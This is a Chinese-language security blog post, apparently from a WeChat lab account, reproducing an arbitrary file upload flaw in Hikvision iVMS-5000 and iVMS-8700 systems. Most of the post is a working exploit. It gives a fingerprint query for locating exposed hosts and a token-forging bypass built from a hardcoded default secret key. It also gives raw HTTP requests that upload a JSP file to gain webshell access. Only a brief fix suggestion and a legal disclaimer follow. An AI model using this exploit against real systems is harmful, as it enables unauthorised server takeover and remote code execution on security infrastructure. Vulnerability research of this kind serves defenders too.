Skip to content

Latest commit

 

History

History
117 lines (62 loc) · 4.8 KB

[巢安实验室]-2023-7-14-海康威视iVMS综合安防系统任意文件上传漏洞.md

File metadata and controls

117 lines (62 loc) · 4.8 KB

海康威视iVMS综合安防系统任意文件上传漏洞

巢安实验室 巢安实验室

巢安实验室

微信号 safe-labs

功能介绍 为荣誉而战,为的是那份自己不屈服于任何人,踢踏是脚下的尊严。

__发表于

收录于合集 #漏洞复现 83个

漏洞简介

海康威视iVMS系统存在在野0day漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

影响版本

海康威视综合安防系统iVMS-5000

海康威视综合安防系统 iVMS-8700

鹰图指纹

 web.body="/views/home/file/installPackage.rar"

**漏洞复现
**

burp抓包,尝试访问接口

POC:

POST /eps/api/resourceOperations/upload HTTP/1.1Host: ****User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: *****Connection: closeCookie: JSESSIONID=02768F721F81F74932E9782F16249669Upgrade-Insecure-Requests: 1  
service=http%3A%2xxxxxxxhome%2Findex.action

构造token绕过认证 (内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证)
默认值:secretKeyIbuilding
token值需要进行MD5加密(32位大写)
组合:token=MD5(url+"secretKeyIbuilding")

成功绕过

然后构造文件上传payload:

POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1Host: ****User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: *****Connection: closeCookie: JSESSIONID=02768F721F81F74932E9782F16249669Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPoUpgrade-Insecure-Requests: 1Content-Length: 177  
------WebKitFormBoundaryGEJwiloiPoContent-Disposition:form-data;name=\"fileUploader\";filename=\"1.jsp\"Content-Type: image/jpeg  
test------WebKitFormBoundaryGEJwiloiPo

访问http://URL/esp/upload/返回得到的resourceUuid的值.jsp,这里不再赘述

修复建议

关闭互联网暴露面访问的权限,文件上传模块做好权限强认证

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

**
**

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 公众号 内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

**
**

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序

取消 允许

取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看